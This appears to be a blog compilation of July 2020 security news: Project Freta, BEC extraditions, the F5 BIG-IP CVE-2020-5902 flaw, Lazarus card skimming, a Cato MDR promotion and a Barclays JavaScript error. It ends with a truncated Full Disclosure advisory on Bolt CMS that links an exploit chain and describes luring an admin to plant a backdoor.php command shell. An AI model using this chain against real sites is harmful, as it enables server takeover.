microsoft linux forensics rootkit scanner

Microsoft has announced a new free-to-use initiative aimed at uncovering forensic evidence of sabotage on Linux systems, including rootkits and intrusive malware that may otherwise go undetected.

The cloud offering, dubbed Project Freta, is a snapshot-based memory forensic mechanism that aims to provide automated full-system volatile memory inspection of virtual machine (VM) snapshots, with capabilities to spot malicious software, kernel rootkits, and other stealthy malware techniques such as process hiding.

The project is named after Warsaw’s Freta Street, the birthplace of Marie Curie, the famous French physicist who brought X-ray medical imaging to the battlefield during World War I.

“Modern malware is complex, sophisticated, and designed with non-discoverability as a core tenet,” said Mike Walker, Microsoft’s senior director of New Security Ventures. “Project Freta intends to automate and democratize VM forensics to a point where every user and every enterprise can sweep volatile memory for unknown malware with the push of a button — no setup required.”

The objective is to infer the presence of malware from memory, at the same time gain the upper hand in the fight against threat actors who deploy and reuse stealthy malware on target systems for ulterior motives, and more importantly, render evasion infeasible and increase the development cost of undiscoverable cloud malware.

rootkit

To that effect, the “trusted sensing system” works by tackling four different aspects that would make systems immune to such attacks in the first place by preventing any program from:

  • Detecting the presence of a security sensor prior to installing itself
  • Residing in an area that’s out of view of the sensor
  • Detecting the sensor’s operation and accordingly erasing or modifying itself to escape detection, and
  • Tampering with the sensor’s functions to cause sabotage

“When attackers and defenders share a microarchitecture, every detection move a defender makes disturbs the environment in a way that is eventually discoverable by an attacker invested in secrecy,” Walker noted. “The only way to discover such attackers is to remove their insight into defense.”

Open to anyone with a Microsoft Account (MSA) or Azure Active Directory (AAD) account, Project Freta lets users submit memory images (.vmrs, .lime, .core, or .raw files) via an online portal or an API, post which a detailed report is generated that delves into different sections (kernel modules, in-memory files, potential rootkits, processes, and more) that can be exported via JSON format.

Microsoft said it focused on Linux due to the need for fingerprinting operating systems in the cloud in a platform-agnostic manner from a scrambled memory image. It also cited the increased complexity of the project, given the large number of publicly available kernels for Linux.

This initial release version of Project Freta supports over 4,000 Linux kernels, with Windows support in the pipeline.

It’s also in the process of adding a sensor capability that allows users to migrate the volatile memory of live VMs to an offline environment for further analysis and more AI-based decision-making tools for threat detection.

“The goal of this democratization effort is to increase the development cost of undiscoverable cloud malware toward its theoretical maximum,” Walker said. “Producers of stealthy malware would then be locked into an expensive cycle of complete re-invention, rendering such a cloud an unsuitable place for cyberattacks.”

The online analysis portal can be accessed here. The full documentation for Project Freta is available here.

Follow me for more information.

The two extraditions of business email compromise attackers indicate a step forward for international law enforcement collaboration.

On Friday, July 3, the Department of Justice announced extraditions of two Nigerian nationals to face charges related to separate business email compromise (BEC) operations. Both men are accused of participating in BEC schemes to defraud US organizations out of millions of dollars.

Ramon Olorunwa Abbas, also known as “Ray Hushpuppi” and “Hush,” was expelled from the United Arab Emirates to Chicago, where he made his first court appearance. Charges allege he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.

Abbas was arrested in the UAE last month and brought to the US to face a charge of conspiring to engage in money laundering, as alleged in a criminal complaint filed June 25. This complaint describes an Instagram account with several publicly viewable images of Abbas posing on or in luxury vehicles, wearing designer clothing, and possessing luxury items “indicating substantial wealth.” In one photo, Abbas posed in front of two vehicles, one of which he said was his new Rolls-Royce Wraith. Multiple photos showed him in private jets or traveling to cities around the world.

“The FBI’s investigation has revealed that Abbas finances this opulent lifestyle through crime, and that he is one of the leaders of a transnational network that facilitates computer intrusions, fraudulent schemes (including BEC schemes), and money laundering, targeting victims around the world in schemes designed to steal hundreds of millions of dollars,” the affidavit states.

This case targeted a key player in a large, transnational scheme who used illicit funds to support his lifestyle while allegedly giving a safe haven to stolen money, says US Attorney Nick Hanna in a statement. The affidavit alleges Abbas and co-conspirators conspired to launder funds in a $14.7 million operation targeting a foreign financial institution. Another scheme attempted to defraud a New York-based law firm out of approximately $922,857 in October 2019. In one case, Abbas and others tried to steal roughly $124 million from an English Premier League club.

“With Hushpuppi, what’s really important about this arrest is he is one of the primary money launderers of the BEC threat landscape,” says Crane Hassold, senior director of threat research at Agari. “From a financial perspective, that is where I think the biggest impact of this will be.”

Hassold describes Abbas as “an essential chokepoint” to money coming in from US BEC attacks and funds going out to Nigeria. Following his arrest, many Nigerian threat actors will need to find a way to transfer money from point to point. “That will take some time, to replace someone at the scale of Hushpuppi,” he adds.

A second case involves Nigerian national Olalekan Jacob Ponle, also known as “Mr. Woodbery” and “Mark Kain.” A criminal complaint accuses him of orchestrating BEC schemes to defraud US companies, which led to attempted or actual losses amounting to tens of millions of dollars. One Chicago company was tricked into sending wire transfers totaling $15.2 million. Ponle was arrested last month in the UAE and, like Abbas, made his first court appearance in Chicago.

Ponle’s alleged operation lasted the first nine months of 2019, during which one or more actors gained unauthorized access to the email account of a US-based company and sent messages to employees claiming to be from the company or a known contact. These fake emails instructed employees to send wire funds to a bank account set up by money mules at Ponle’s request. He instructed the mules to convert funds to Bitcoin and send them to a virtual wallet he controlled.

In addition to Chicago, Ponle targeted firms in Iowa, Kansas, Michigan, New York, and California.

Bringing BEC Operations to Justice
These extraditions represent a step forward in how foreign BEC attackers will be brought to justice. The DoJ, in collaboration with the Department of Treasury, recently published the first set of formal sanctions against Nigerian cybercriminals. Officials imposed financial sanctions on each of six individuals charged with involvement in BEC operations.

“This action represents a significant shift in how the United States responds to these types of criminal activities and demonstrates a willingness to impose cost to cyber actors living abroad outside of the reach of US law enforcement,” says Pete Renals, principal researcher for Unit 42 at Palo Alto Networks. He anticipates more extraditions will be announced in coming months.

It’s worth noting that many BEC attackers have a global footprint, Hassold points out. It’s likely they will be extradited to other countries if they cause more damage somewhere else. Even so, what we see here is not only are more people being extradited for BEC — the transition from arrest to extradition is happening quickly, indicating a willingness among international law enforcement organizations to work together and support extradition for these types of attacks.

“It’s important to consider that extradition isn’t necessarily a long-term solution,” says Renals. “At a macro level, there is a need for rapid adoption of legal frameworks tailored to what is arguably a new and nascent threat.”

BEC schemes haven’t been around long, but in that time, they have “grown exponentially” in terms of scale, global reach, and financial impact, he adds. These threats cost businesses $1.7 billion in 2019 alone, the FBI reported back in February. In the cases of both Abbas and Ponle, the attackers made hundreds of thousands of dollars in a single operation, emphasizing the financial impact of these types of attacks.

Related Content:

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

The US Cybersecurity and Infrastructure Security Agency encourages organizations to patch a critical flaw in the BIG-IP family of application delivery controllers, as firms find evidence that attackers are scanning for the critical vulnerability.

Attackers targeted a critical vulnerability in the BIG-IP family of application delivery controllers — devices that secure major web applications and help balance traffic loads for large sites — only two days after network-appliance maker F5 patched the issue, according to two organizations.

The attacks target F5 devices that have exposed the administrative user interface to the Internet, a SANS incident handler stated in an entry on the SANS Internet Storm Center blog. A number of opportunistic scans are targeting the BIG-IP Traffic Management User Interface (TMUI), aiming to trigger the vulnerability and take control of insecure devices.

For the thousands of BIG-IP appliances that expose the interface to the Internet, the scanning could result in extensive compromises of the protected sites and networks, says Johannes Ullrich, dean of research at the SANS Technology Institute and a founder of the Internet Storm Center.

“The problem is that these devices are perimeter devices, so a single device compromise means that the entire network behind it is compromised as well,” he says.

The attacks started only two days after F5, the maker of the BIG-IP products, announced on July 1 that its products had two vulnerabilities, one of which is a remote code execution attack that allows code to be injected into the appliance’s configuration manager.

The vulnerability “results from security flaws in multiple components, such as one that allows directory traversal exploitation,” says Mikhail Klyuchnikov, a security expert at Positive Technologies, who found and initially reported the vulnerabilities. “This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the Internet.”

Positive Technologies released its own advisory on July 2, the day after the patch. Active exploit of the most critical vulnerability started on July 3, according to security consultancy NCC Group, which also detected scans. By July 5, fully functioning exploits and payloads were being shared on Twitter and Metasploit modules were available, according to NCC Group.

F5’s BIP-IP devices are used as application-delivery controller by many large companies, with F5 saying that 48 companies in the Fortune 50 use the devices. 

The vulnerability (CVE-2020-5902) occurs in the TMUI, also referred to as the Configuration utility, giving unauthenticated attackers with access to the interface the ability to execute arbitrary code, including the ability to create files, delete, and disable service.

The vulnerability could have affected at least 8,000 devices in June, according to Positive Technologies. Most of the vulnerable devices — 40% — were in the United States, while 16% were in China. Other countries with significant installations are Taiwan, Canada, and Indonesia.

Attacks have attempted to exploit vulnerable BIG-IP devices and download the password file. At least two staged payloads, which initially compromise the device and then attempt to download and install other malicious software to extend control, were observed as well.

The rapid reverse engineering of the patch is unsurprising because the exploit is very simple, according to the NCC Group. Using three characters, an attacker can try to run code in what should be an unreachable directory.

“[I]t can be described as a directory traversal vulnerability,” NCC Group stated in its analysis. “This ability combined with functionality native to the device provides the ability to access files, upload files and execute code without authentication.”

While at least 8,400 BIG-IP devices had the control interface accessible from the Internet in late June, as of July 6, fewer than 2,000 devices appeared to be vulnerable, according to SANS’s Ullrich. 

The network infrastructure vulnerability comes a week after another popular perimeter security device maker, Palo Alto Networks, warned that its devices had a vulnerability in the way that they processes Security Assertion Markup Language (SAML), allowing an attacker to bypass the security. 

Because the devices are easier to test these days, more vulnerabilities may be in the works, Ullrich says.

“There are all these perimeter devices, and researchers have really focused on them, because they are much easier to test these days,” he says. “Most vendors provide virtual devices that you can download and test and not have to shell out a lot of cash.”

Related Content

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Since at least May 2019, the state-sponsored threat actor has stolen card data from dozens of retailers, including major US firms.

North Korea’s constantly evolving Lazarus Group appears to have diversified into skimming online payment cards over the past year or so.

Sansec, a Netherlands-based security firm, says its researchers have found evidence tying the advanced persistent threat (APT) group to attacks on the websites of several large US retailers going back to at least May 2019. In each of the attacks, the threat actors planted malicious code for capturing payment card data entered into checkout pages by people paying for purchases on these sites.

In a report Monday, Sansec says it has so far not been able to determine how the attackers managed to breach these sites initially in order to plant the card-skimming code. But data from the attacks shows Lazarus Group members used the website of an Italian modeling agency, a vintage music store in Iran, a family-run bookstore in New Jersey, and other sites to funnel stolen payment card data to Dark Web market places. The sites — which were running WordPress — were previously compromised and repurposed to distribute the stolen assets, Sansec says in its report.

“They used these compromised WordPress sites as exfiltration proxies,” says Willem de Groot, a security researcher at Sansec. “During store purchases, card data was logged and sent to these exfiltration nodes.” The purpose of these proxies is to hide the true destination of the stolen assets, he notes.

In its report, Sansec says it has identified “multiple, independent links between recent skimming activity and previously documented North Korean hacking operations.” Among the pieces of evidence are several IP addresses and domains that have been previously associated with the Lazarus Group.

The Sansec report identified jewelry and fashion accessories firm Claire’s as one of the organizations impacted in the attacks. But it did not offer any information on other victims or the volume of card data that Lazarus Group might have stolen so far. According to de Groot, the intelligence Sansec has gathered suggests the APT group infiltrated at least a “few dozen stores with several large US retailers among them.”

In attacks involving some of the larger brands, Lazarus Group members used dedicated exfiltration domains — rather than the compromised WordPress websites — to funnel stolen card data to underground markets, de Groot says.

“It is clear that a lot of preparation and effort was invested in setting up these later campaigns,” he says. “This contrasts with Magecart activity over the last few years, which was largely opportunistic.”

Constantly Evolving Tactics
The Lazarus Group (aka Hidden Cobra) is a well-known APT group that the US government and others have described as acting on behalf of North Korea’s (DPRK) government. In recent years, the group has been associated with a string of high-profile attacks, including one on Sony Pictures in 2014, the WannaCry ransomware attacks, and another on the Bank of Bangladesh, which netted it some $81 million. In recent years the group has also been associated with numerous cryptocurrency-mining campaigns.

“Over the years DPRK actors have demonstrated their ability to use instruments and techniques that are not usually related to APT operations,” says Jim Walter, threat researcher at SentinelOne. As examples, he points to Lazarus Group’s cryptomining and its adoption of commodity malware and other common off the shelf tools. 

“In SentinelLabs, we revealed in the past how DPRK actors are working with commercial cybercrime tools, like TrickBot Anchor Project,” he says.  

Many believe that Lazarus Group’s financially motivated attacks are designed to generate money for the sanction-hit North Korean government’s nuclear program.

“Traditionally, seeing a state-sponsored group carry out a card-skimming campaign might seem curious, especially if it was a wealthier nation,” says Hank Schless, senior manager of security solutions at Lookout. “However, North Korea is so heavily sanctioned and struggles economically, so it will clearly use whatever tactics it can to get access to funds.”   

Brandon Hoffman, CISO, and head of security strategy at Netenrich, says the Lazarus Group’s move further into the realm of cybercrime is no surprise given its past activities.

“From their perspective, if they have the tools and skills to perform advanced persistent threat activity, why wouldn’t they use it to fill the coffers as well?” he says.

Related Content:

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

The payment-card skimmer targets websites hosted on Microsoft IIS servers and running the ASP.NET web framework.

A credit-card skimmer is exclusively targeting websites that are hosted on Microsoft IIS servers and running ASP.NET, the company’s web framework for developing web applications and services.

Malwarebytes Lab researchers found more than a dozen websites compromised with malicious code injected into one of their existing JavaScript libraries. The campaign likely started in April 2020 and has affected a range of victims, including sports organizations, health and community associations, and a credit union.

Attackers don’t seem to be targeting a specific JavaScript library, the researchers say, and their code sometimes takes different forms. All victim websites were running ASP.NET version 4.0.30319, which the researchers note is no longer officially supported and contains multiple flaws. 

ASP.NET is less common than PHP but still accounts for “a sizeable market share” and includes websites with shopping-cart applications, according to a blost post by Jerome Segura, head of threat intelligence. All of the victim websites had shopping portals, which were the attackers’ target. The skimmer is built to look for credit-card numbers and passwords; however, the password-seeking method “appears to be incorrectly implemented,” he wrote.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database CVE-2020-5595
PUBLISHED: 2020-07-07

TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains a buffer overflow vulnerability, which may allow a remote attacker to stop the network functions of the products or execute…

CVE-2020-5596
PUBLISHED: 2020-07-07

TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) does not properly manage sessions, which may allow a remote attacker to stop the network functions of the products or execute a mali…

CVE-2020-5597
PUBLISHED: 2020-07-07

TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains a null pointer dereference vulnerability, which may allow a remote attacker to stop the network functions of the products o…

CVE-2020-5598
PUBLISHED: 2020-07-07

TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains an improper access control vulnerability, which may which may allow a remote attacker tobypass access restriction and stop …

CVE-2020-5599
PUBLISHED: 2020-07-07

TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains an improper neutralization of argument delimiters in a command (‘Argument Injection’) vulnerability, which may allow a remo…

Follow me for more information.

Managed Threat Detection and Response

Lately, we can’t help noticing an endless cycle where the more enterprises invest in threat prevention; the more hackers adapt and continue to penetrate enterprises.

To make things worse, detecting these penetrations still takes too long with an average dwell time that exceeds 100 (!) days.

To keep the enterprise protected, IT needs to figure out a way to break this endless cycle without purchasing complex security and data analysis tools and hiring the right (skilled and expensive) security professionals to operate them.

Enter MDR

An advanced security service, Managed Detection and Response (MDR), provides ongoing threat detection and response, leveraging AI and machine learning to investigate, alert, and contain threats.

MDR is becoming popular and gaining traction. In fact, Gartner forecasts that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. And by 2024, 40% of midsize enterprises will use MDR as their only managed security service (source: Gartner’s Market Guide for Managed Detection and Response Services Published 15 July 2019 – ID G00367208).

MDR is the industry’s hope to break the cycle of adding more and more threat prevention tools, as hackers continuously increase their attack capabilities. Yet, to gain visibility into all network traffic – critical for effective detection and response – traditional MDR services require installing dedicated software and hardware across an enterprise’s network.

This deployment model is expensive and complex, causing many companies to put off implementing MDR services while leaving their network at risk.

Houston, we have a triple problem

1 — Every enterprise is a target for hackers, regardless of its size or type of business. According to Verizon’s 2019 Data Breach Investigations Report (DBIR), 43% of breaches involved small business victims; 10% were breaches of the Financial Industry, and 15% were breaches involving Healthcare organizations.

2 — On top of that, enterprises need always to assume the worst, as Gartner states clearly, “The assumption must be that the organization will be compromised, that the hacker’s ability to penetrate systems is never fully countered. Continuous monitoring of systems and behavior is the only way to reliably detect threats before it is too late.”

3 — As a result, enterprises must continuously stand guard, presenting a huge challenge for IT in terms of resources and in-house skills. Furthermore, according to the DBIR, “56% of breaches took months or longer to discover,” which during this long dwell time the malware distributes itself, spreads throughout the enterprise, and when activated, the damage caused is multiplied.

In short, if all enterprises are targets, and must always assume they’re under attack, then IT needs to be watching 24/7. Hmmm, does this sound impractical to anyone else?

Okay, we’ve had a problem – meet Cato MDR

Cato MDR is incorporated into Cato’s SASE platform, overcoming the complications of traditional MDR. Cato aims to break the endless cycle of increasing threats and lurking hackers. How? By enabling customers that use Cato Cloud, to offload the resource-intensive and skill-dependent process of detecting compromised endpoints, to its SOC team. The team has instant, clear visibility to all traffic, and there’s no need for customers to deploy any additional network probes or software agents.

Cato automatically collects, indexes, and stores the metadata of every WAN and Internet traffic flow traversing the Cato Cloud. Data aggregation and machine learning algorithms mine the full network context of Cato’s huge data warehouse, detecting any malware indicators across customer networks. Cato’s SOC team assesses the traffic flaws and alerts customers on any active threats.

A sneak peek behind the scenes

Cato claims that its MDR service stands guard for customers, and dwell time is reduced from months to just 1-2 days. We had to get a closer look to understand, if and how this is possible. Here’s what we found.

Cato’s MDR service delivers these key capabilities:

  • Zero-footprint data collection: Cato can access all relevant information for threat analysis since it already serves as the customer’s network platform (remember, Cato MDR is integrated into Cato’s SASE platform). This eliminates the need for any further installations, and all that’s left for customers is to subscribe to the service.
  • Automated threat hunting: Cato uses big data and machine learning algorithms to mine the network for suspicious flows, which are based on the many flow attributes available to Cato. These include accurate client application identification, geolocation, risk assessment of the destination based on IP, URL category, URL name structure, frequency of access, and more.
  • Human verification: Cato’s SOC team inspects suspicious flows on a daily basis, closing the investigation for benign traffic.
  • Network-level threat containment: Cato alerts customers in case of a verified threat, and based on a predefined policy, will apply network-level threat containment by blocking the network traffic.
  • Guided remediation: Cato provides the context of threats for IT’s further reference and recommends the actions to be taken for remediation.

Additional cool capabilities

Multi-dimensional approach:
Cato has full visibility into all network traffic. From each network flow that passes through its MDR service, Cato extracts and collects metadata on the following:

  • Source – Cato distinguishes between human and non-human traffic, client type, OS data,
  • and more.
  • Destination – Cato sees the popularity, category, and reputation.
  • Behavior – Cato knows the traffic patterns, such as frequency and volume of data.

Cato then stores all this metadata in its big data repository.

Cato's unique multi-dimensional approach
Cato’s unique multi-dimensional approach

Threat hunting:

We zoomed into Cato’s threat hunting technology and learned that Cato reduces a daily quantity of millions of flows down to only 10-20 flows, which need actually to be investigated by its SOC team. The team then reviews the list and makes sure customers are only notified of confirmed threats that need attention. This eliminates what we all dread – false positives.

Threat hunting – from millions of events to a meaningful, actionable item
Threat hunting – from millions of events to a meaningful, actionable item

Service walkthrough

The Cato MDR portal is where customers handle all requests and activities. The portal includes an online ticketing system, through which all threats are reported, and their remediation status is tracked. We found the portal to be intuitive and self-explanatory; we’re happy to take you through a quick walkthrough:

Once you log into the portal, you’ll be able to view your company’s activities’ detailed status.

View all company activities and requests
View all company activities and requests

For each request category, you can see a summary of all active tickets that include: the ID number of a specific request, the name of the requestor, the time of the last activity performed on the request, and the status of the ticket.

Clicking on any of the requests enabled us to drill down into its specifics. Each threat incident includes the following detailed information:

  • Name and IP of the site on which a threat was discovered.
  • Type and name of threat.
  • Risk level of a specific threat type.
  • Internal/external IP address that is the target of an attack.
  • Domain name that refers to a server’s IP address.
  • Destination port number of a communication channel.
  • Reference and link to Cato’s event discovery (Instant Insight).
  • Action taken by Cato’s SOC team.
  • Further reference to a specific threat or attack.
  • Recommended action for customers to take for removing a threat.
Drill down into any request
Drill down into any request

Cato MDR generates monthly reports that list all previous and ongoing investigations and include an executive summary section, which we found especially beneficial for easily sharing with relevant peers and managers.

Monthly audit reports of all events

Monthly audit reports of all events

Monthly audit reports of all events

Wrap-up

Cato MDR won us (and Cato customers) over with its sophisticated capabilities on the one hand, and easy-to-use portal on the other. But mostly we were impressed by the peace and quiet it provides enterprises and their IT teams. Cato supports Gartner’s four stages of an adaptive security architecture.

Cato’s integrated security stack addresses the Prediction and Prevention stages, and Cato MDR concludes with the remaining stages of Detection and Response.

Cato Cloud
Cato MDR adds Detection and Response to Prediction and Prevention already delivered by Cato Cloud

Big LIKE Cato Networks!

Follow me for more information.

Securing the Internet of Things requires diligence in secure development and hardware design throughout the product life cycle, as well as resilience testing and system component analysis.

As devices and technologies connecting us to the world evolve, cybercriminals are evolving their methods to attack and compromise critical systems across the Internet of Things (IoT). Building IoT products that can withstand the test of time against cyber threats requires security controls built into your software development life cycle and supply chains, consistently. Any critical security flaw in the overall supply chain can lead to a breach. Securing IoT requires diligence in secure development and secure hardware design throughout the product life cycle while performing resilience testing and analysis of system components to detect issues that may manifest at runtime, prior to production. 

IoT is challenging from a security perspective because of its diverse supply chain and large attack surface. Understanding an IoT ecosystem and all the various interfaces requires the comprehension of risk and how the presented interfaces may affect the overall system if compromised. As vulnerabilities within different layers of the stack may undermine other security controls, testing IoT for security often requires specialized domain knowledge of many technologies. For example, in most cases if a Trusted Platform Module (TPM) is compromised, it is a game-over vulnerability for a product or device regardless of how secure your code is.

It’s important for security teams to simplify the implementation of architecturally complex security tasks through a tightly integrated technology stack in order to help development teams establish a secure foundation before addressing other security flaws within their design. Performing architectural analysis and threat modeling of hardware, software, and infrastructure early in development to determine where security controls are weak and could introduce security bugs or design flaws is critical for keeping security debt low as the product is built. 

Performing fuzzing and automated testing as components are developed and assembled helps identify issues quickly and identifies potential edge cases that could be more difficult to detect during peer reviews. Building security coverage into your development practices early is important for keeping security top of mind and not falling behind in later cycles or releases.

Another challenging aspect of IoT is the broad and deep skill set required for assessments. Skills required include an understanding of hardware internals, electrical engineering, software development expertise, and custom low-level networking protocols, but are not limited to just these. Effective assessments should successfully identify weaknesses in an entire IoT architecture, including software, API, web, and mobile components. IoT reviews should include source code review, software and hardware testing, forensic analysis, and reverse engineering. 

Organizations also need to have a deep understanding of how their systems behave when they encounter failures. Chaos and resilience testing ensure that self-healing capabilities are built into software and infrastructure so that attacks do not have a cascading effect against your system. If a safety-critical service fails in a way that causes contagion to other components, often this can be identified only within a fully deployed end-to-end stack.

It is the inevitable truth that organizations will encounter many challenges in their quest to secure IoT. There is no simple formula or answer; however, there are several key measures that organizations can implement to protect against the increasingly sophisticated cyber threats we face today, such as taking the time to develop a deep understanding and awareness of the security features of the IoT technology they regularly use. Performing consistent and periodic reviews of the software and infrastructure architecture, which houses critical data, is also essential to IoT security.

Related Content:

Jack Mannino is the CEO of nVisium. Passionate about security and impossible to keep away from a keyboard, his expertise spans over 15 years of building, breaking, and securing software. Jack founded nVisium in 2009, and since then has helped the world’s largest software … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

f5 big-ip application security manager

Cybersecurity researchers today issued a security advisory warning enterprises and governments across the globe to immediately patch a highly-critical remote code execution vulnerability affecting F5’s BIG-IP networking devices running application security servers.

The vulnerability, assigned CVE-2020-5902 and rated as critical with a CVSS score of 10 out of 10, could let remote attackers take complete control of the targeted systems, eventually gaining surveillance over the application data they manage.

According to Mikhail Klyuchnikov, a security researcher at Positive Technologies who discovered the flaw and reported it to F5 Networks, the issue resides in a configuration utility called Traffic Management User Interface (TMUI) for BIG-IP application delivery controller (ADC).

BIG-IP ADC is being used by large enterprises, data centers, and cloud computing environments, allowing them to implement application acceleration, load balancing, rate shaping, SSL offloading, and web application firewall.

F5 BIG-IP ADC RCE Flaw (CVE-2020-5902)

An unauthenticated attacker can remotely exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

Successful exploitation of this vulnerability could allow attackers to gain full admin control over the device, eventually making them do any task they want on the compromised device without any authorization.

f5 big-ip application security manager

“The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,” Klyuchnikov said.

“RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation.”

As of June 2020, more than 8,000 devices have been identified online as being exposed directly to the internet, of which 40% reside in the United States, 16% in China, 3% in Taiwan, 2.5% in Canada and Indonesia and less than 1% in Russia, the security firm says.

However, Klyuchnikov also says that most companies using the affected product do not enable access to the internet’s vulnerable configuration interface.

F5 BIG-IP ADC XSS Flaw (CVE-2020-5903)

Besides this, Klyuchnikov also reported an XSS vulnerability (assigned CVE-2020-5903 with a CVSS score of 7.5) in the BIG-IP configuration interface that could let remote attackers run malicious JavaScript code as the logged-in administrator user.

“If the user has administrator privileges and access to Advanced Shell (bash), successful exploitation can lead to a full compromise of BIG-IP via RCE,” the researcher said.

Affected Versions and Patch Updates

Affected companies and administrators relying on vulnerable BIG-IP versions 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x are strongly recommended to update their devices to the latest versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4 as soon as possible.

Moreover, users of public cloud marketplaces like AWS (Amazon Web Services), Azure, GCP, and Alibaba are also advised to switch to BIG-IP Virtual Edition (VE) versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.0.1.4, or 15.1.0.4, as soon as they are available.

Follow me for more information.

Barclays Bank appears to have been using no less than the Internet Archive‘s Wayback Machine as a “content distribution network” to serve up a Javascript file.

The bizarre discovery was made by Twitter user @immunda, who discovered on Thursday that the British financial institute was calling JS from the Internet Archive.

Tweet @Barclays

Click to enlarge

Shortly after an abortive tussle with Barclays’ automated Twitter DM chatbot, he declared that he had got through to a human who had promised to fix the alarming howler.

The howler in question appeared, on The Register‘s inspection, to be pulling a file from this URL on the Internet Archive:

web.archive.org/web/20200601165625/https://www.barclays.co.uk/content/dam/javascript/dtm/target.js

If web.archive.org went down, it would presumably break Barclays’ website as well. Worse, if someone managed to change the JS file at that URL, they could inject … well, whatever they liked.

JS is a favourite attack vector of, among other things, the Magecart financial creds-stealing gang.

Professor Alan Woodward of the University of Surrey told The Register: “It’s just the sort of thing that a Magecart attack would thrive on. At the end of the day, it is the organisation who integrates all of these assets, including those drawn in from other sites, to ensure that they have a secure site, and that can only ever be true if you know what your site comprises.”

He continued: “Who would use the Internet Archive to draw in an important asset like a Javascript file, or any file for that matter?”

The professor pointed us to a Twitter thread by infosec researcher Scott Helme, who went down the rabbit hole to try to figure out why Barclays was doing such an obviously stupid thing.

We’ve asked Helme for his non-280-character thoughts on his findings.

The practice is not unheard of, though as some have pointed out, it is a very bad idea and the nonprofit is not set up to support it.

Jake Moore of infosec biz Eset mused that it may have been a test of some kind gone badly wrong, adding: “Although no excuse, it is yet another reminder why testing is a full and thorough process especially when dealing with a financial institution.”

We have asked Barclays for its explanation and it would only say: “We take our responsibility to protect our customers’ data extremely seriously and it is a top priority. We want to reassure our customers that their data was not at risk as a result of this error.”

We have also asked the Internet Society for its views. ®

Follow me for more information.


fulldisclosure logo
Full Disclosure
mailing list archives






Bolt CMS <= 3.7.0 Multiple Vulnerabilities – CSRF to RCE



From: Sivanesh Ashok <sivaneshashok () gmail com>
Date: Fri, 3 Jul 2020 17:31:32 +0530



##########################################################################
# Bolt CMS <= 3.7.0 Multiple Vulnerabilities #
########################################################################## Author - Sivanesh Ashok | @sivaneshashok | stazot.com Date : 2020-03-24
Vendor : https://bolt.cm/
Version : <= 3.7.0
CVE : CVE-2020-4040, CVE-2020-4041
Last Modified: 2020-07-03 --[ Table of Contents 00 - Introduction 01 - Exploit 02 - Cross-Site Request Forgery (CSRF) 02.1 - Source code analysis 02.2 - Exploitation 02.3 - References 03 - Cross-Site Scripting (XSS) 03.1 - Preview generator 03.1.1 - Exploitation 03.2 - System Log 03.2.1 - Source code analysis 03.2.2 - Exploitation 03.3 - File name 03.3.1 - Source code analysis 03.3.2 - Exploitation 03.3.3 - References 03.4 - JS file upload 03.4.1 - Exploitation 03.5 - CKEditor4 03.5.1 - Exploitation 04 - Remote Code Execution 04.1 - Source code analysis 04.2 - Exploitation 04.3 - References 05 - Solution 06 - Contact --[ 00 - Introduction Bolt CMS is an open-source content management tool. This article details
the multiple vulnerabilities that I found in the application. The
vulnerabilities when chained together, resulted in a single-click RCE which
would allow an attacker to remotely take over the server. The link to the
exploit is provided in the next section. --[ 01 - Exploit Chaining all the bugs together results in a single-click RCE. The exploit
that does that can be found in the link below.
https://github.com/staz0t/exploits/blob/master/SA20200324_boltcms_csrf_to_rce.html Host the exploit code in a webpage and send the link to the admin. When the
admin opens the link, backdoor.php gets uploaded and can be accessed via,
http://targetbolt.com/files/backdoor.php?cmd={insert_cmd_here} --[ 02 - Cross-Site Request Forgery (CSRF) Bolt CMS lacks CSRF protection in the preview generating endpoint. Previews
are intended to be generated by the admins, developers, chief-editors, and
editors, who are authorized to create content in the application. But due
to lack of CSRF protection, an unauthorized attacker can generate a
preview. This CSRF by itself does not have a huge impact. But this will be
used with the XSS, which are described below. --[ 02.1 - Source code analysis The preview generation is done
by preview() function which is defined in
vendor/bolt/bolt/src/Controller/Frontend.php:200 and there is no token
